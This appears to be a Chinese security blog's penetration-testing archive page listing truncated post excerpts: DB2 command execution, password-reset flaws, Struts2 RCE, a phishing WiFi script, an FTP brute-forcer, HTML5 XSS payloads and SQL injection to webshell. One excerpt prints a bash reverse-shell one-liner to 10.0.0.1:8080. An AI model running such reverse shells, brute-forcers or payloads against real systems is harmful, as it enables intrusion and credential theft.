分类目录归档：渗透测试

2020
07-23

日常渗透测试搞站记录

DB2 数据库权限执行系统命令 记录一下拿到db2数据库权限之后，进行系统命令执行的过程，db2默认绑定的是50000端口： 1、创建一个临时的表 CREATE TABLE 数据库名.表名 (  test VARCHAR (500)  ) ; 2、创建存储过程(windows) CREATE PROC.... Read More >

2019
08-03

各cms安装处任意文件读取(MySQL connect file read)

周末在公司打酱油，看到监控的某个漏洞平台上出现了很多个新的漏洞，漏洞标题都是 xx cms 安装处任意文件读取。 不明所以，加了漏洞提交者的微信，看看了提交者在某大会的演讲ppt，在微信群问了温，Goolge了一下，看到几篇文章，很涨姿势，贴上各文章的URL，记录一下以后可能会用到。 https://xz.aliyun.com/t/3973 http://russiansecur.... Read More >

2019
07-31

Powershell脚本MailSniper报错”无法将xxx项识别为cmdlet、函数”

解决powershell脚本运行的报错，系统环境是windows 10 C:\Users\Administrator>powershell.exe -exec bypass Windows PowerShell 版权所有 (C) Microsoft Corporation。保留所有权利。 PS C:\Users\Administrator> d: PS D:\> cd .... Read More >

2017
11-01

任意用户密码重置的10种姿势

以前安全测试最爱挖的就是任意用户密码重置，今天看了carry_your师傅在ichunqiu上的视频文字总结一下任意用户密码重置的10种姿势： 1，短信验证码可爆破； 视频案例中输入手机号码、图片验证码就可以获取短信验证码，并且新密码也是在一个页面中，但是输入短信验证码之后，后端有个请求会判断短信验证码是否正确，错误的话页面会有提醒。攻击者可以用这个请求来爆破验证码，获取到正确的短信验.... Read More >

2017
05-05

wordpress 4.6远程代码执行漏洞环境搭建

这篇文章主要是记录下搭建漏洞测试环境的过程，然而从中午开始，断断续续的一直折腾到凌晨，只是搭建了成功了本地能复现的环境，并没有实现远程复现。 究其原因，主要是固执到一直想用daocloud来搭建测试环境，坑好多，花了太多时间来填坑了，记录下过程。 docker pull wordpress:.... Read More >

2017
03-09

如何最大化的将漏洞扼杀在摇篮里

安全攻城狮在公司存在之初，刚开始更多进行的是救火的工作，救火工作并不能从根源上解决漏洞的产生。 如何最大化的将漏洞扼杀在产生之初，这个实际上某个dalao提的问题，问了几位老司机，做一下小笔记。 1，定期化的安全培训，需要注重培训效果、培训次数、培训覆盖面、帮助文档、培训反馈； 2，系统设计阶段，就需要安全测试小伙伴的介入，了解开发过程、熟悉业务流程，只有掌握足够多的信息，才能发.... Read More >

2017
03-07

[紧急预警]Struts2 基于Jakarta的远程命令执行漏洞

安恒给官方上报的，然后官方选择了1个对国内来说比较敏感的时期发了公告出来，好蛋疼。 该漏洞的CVE编号是CVE-2017-5638(s2-045)，攻击者利用该漏洞可以进行远程命令执行，从而获取更高的服务器权限。 查了点资料，发现跟struts2配置中常量的配置有关，以struts-2..... Read More >

2015
09-05

解决:Failed to open Jython JAR file

BurpSuite安装插件SQLipy的时候遇到如下的错误： java.lang.Exception: Failed to open Jython JAR file at burp.p9b.<init>(Unknown Source) at burp.hec.a(Unknown.... Read More >

2015
07-25

Kali linux创建钓鱼wifi热点

最近做了一个小的安全意识培训，目的是让小伙伴们谨防不信任的Wifi热点，用到了kali linux下的一些小工具。我是用物理机安装的kali linux，然后外接了一个无线网卡wlan2。 具体的技术细节记录一下，具体的shell脚本如下： #! /bin/bash case $1 in “start”) sleep 1 ifconfig wla.... Read More >

2013
11-19

FTP帐号密码暴力破解小工具(新手学python)

群内一童鞋写的ftp暴力破解小工具，主要用到了FTP模块,功能很简单，不大实用，还有很多需要改进的地方，贴上代码： from ftplib import FTP import time def ConnectFtp(ftpAddress,user,password): for myaddress in ftpAddress: f=FTP(myaddress) .... Read More >

2013
11-07

python自动投票（新手学python）

前段时间看到黑马发起的2013年度创业家评选的网络投票活动，发现没有对单IP投票次数进行限制，可以无限次的投！ 公司的大BOSS居然也在候选名单中，准备给大BOSS刷点票，写了个python自动投票脚本！主要用了httplib模块自动提交post请求. 贴上代码： #!/usr/bin/env python #coding=utf8 import httplib, urlli.... Read More >

2013
10-21

反弹shell的十种姿势

转载自 Wooyun Zone 作者:XSSER bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 注意这个是由解析shell的bash完成，所以某些情况下不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;socke.... Read More >

2013
07-10

HTML5下的XSS测试代码

国外某童鞋收集整理的针对HTML5的 XSS测试代码 <video> <source onerror=”javascript:alert(1)”> 引入媒体类测试代码Example: <video onerror=”javascript:alert(1)”>.... Read More >

2013
04-25

共享的主机服务器风险简单分析

这篇文章的目标受众是服务器管理员，网站管理员，安全爱好者和专业信息安全人员等，主要简单分析了一个主机服务器存在的一些风险。 让我们来看看在一个共享的托管服务器上，你的网站不是那么安全的一些原因： 1，如果服务器上有任何一个网站被攻破，其它的网站可能也会面临被攻破的可能； 2，恶意攻击用户可以从主机提供商购买虚拟主机，然后达到入侵其它同服务器网站的目的； 3，虚拟主机没有足够.... Read More >

2013
04-18

DVWA之从SQL注入到写入webshell

这篇文章谈论简单的技术，利用sql注入(SQLi)漏洞，并获得一个webshell，所有的演示都是用DVWA（渗透测试演练系统）.对于SQL注入利用，有以下几个基本步骤: 1,发现SQL注入点; 2,通过mysql数据库帮助，进一步进行注入，获取帐号密码等敏感信息； 3,上传web.... Read More >

2013
03-25

w3af、N-stalker等Web渗透测试工具使用介绍

本人将介绍几款比较不错的Web渗透测试工具,Powerfuzzer、N-Stalker和w3af.通过本人你将学会这几款工具的简单使用，以及xss、sqli等常见漏洞的利用等，适合新手朋友。 Powerfuzzer 官方网站：http://www.powerfuzzer.com Pow.... Read More >